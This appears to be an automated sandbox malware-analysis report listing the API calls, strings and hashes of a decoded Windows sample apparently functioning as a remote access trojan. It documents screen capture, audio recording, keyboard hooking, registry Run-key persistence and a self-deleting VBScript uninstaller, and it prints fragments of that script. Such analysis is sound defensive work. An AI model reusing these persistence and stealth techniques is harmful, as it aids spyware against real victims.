                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 38e53c6cfc7cb631d95e4ce9c5c01e1ef7a193c552409f515a30de06c8f2677d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 07af33583a8a83ff99ca2172f1390c5359c3612c4c959e5766ab832e566f1312
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e53c6cfc7cb631d95e4ce9c5c01e1ef7a193c552409f515a30de06c8f2677d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE71F431A042858FFF15CF68C9817AEBFE1EF46290F19856DD8869B34AC734E845C761
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0b9eeeb525da096657ebf3a7c1a5f77e6f05c971ae1611c1824229deae7698f9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0711c07a30d122a0ed161523b27e3c0cbd1b5143a9b7310719e51d773ed592eb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b9eeeb525da096657ebf3a7c1a5f77e6f05c971ae1611c1824229deae7698f9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F71D231B047858BEF15CE68C8803AEBBE1EF46290F19856DD885DB78AC734EC45C7A1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 630ecb88457be3648657eb57e3c78cf78304789516621443522bf01dd35d6fbf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81616F32A083159FC308DF75E581A5BB7E5BFCC718F450E1EF489DA151E634EA088B86
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 41d4b9db5622d712369f1408fb9efcee329c75454cb88c5cc876d862a952f1b9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B112B7774098243F680CD3ED9F45ABE7DAEFC63E1F29437AD2824B65CD22299459600
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
  • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
• DeleteDC.GDI32(?), ref: 0041806D
• DeleteDC.GDI32(00000000), ref: 00418070
• SelectObject.GDI32(00000000,00000000), ref: 0041807B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
• GetCursorInfo.USER32(?), ref: 004180C5
• GetIconInfo.USER32(?,?), ref: 004180DB
• DeleteObject.GDI32(?), ref: 0041810A
• DeleteObject.GDI32(?), ref: 00418117
• DrawIcon.USER32(00000000,?,?,?), ref: 00418124
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
• GetObjectA.GDI32(?,00000018,?), ref: 00418183
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
• DeleteDC.GDI32(?), ref: 0041828F
• DeleteDC.GDI32(00000000), ref: 00418292
• DeleteObject.GDI32(00000000), ref: 00418295
• GlobalFree.KERNEL32(00CC0020), ref: 004182A0
• DeleteObject.GDI32(00000000), ref: 00418354
• GlobalFree.KERNEL32(?), ref: 0041835B
• DeleteDC.GDI32(?), ref: 0041836B
• DeleteDC.GDI32(00000000), ref: 00418376
• DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                                              • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                                              • API String ID: 1861856835-3168347843
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 44f67282e739eeeaecd7b98bee20d2130426973c535ae0ed412f808c5b449250
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f67282e739eeeaecd7b98bee20d2130426973c535ae0ed412f808c5b449250
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                                                                                                              • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 738084811-2745919808
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 94bde5182454edb9779fbb2972f0ac70c4d1530fe6c04ab16a1576c090f81020
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94bde5182454edb9779fbb2972f0ac70c4d1530fe6c04ab16a1576c090f81020
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Write$Create
                                                                                                                                                                                                                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 1646373207-3059492839
APIs
• _wcslen.LIBCMT ref: 0040BC75
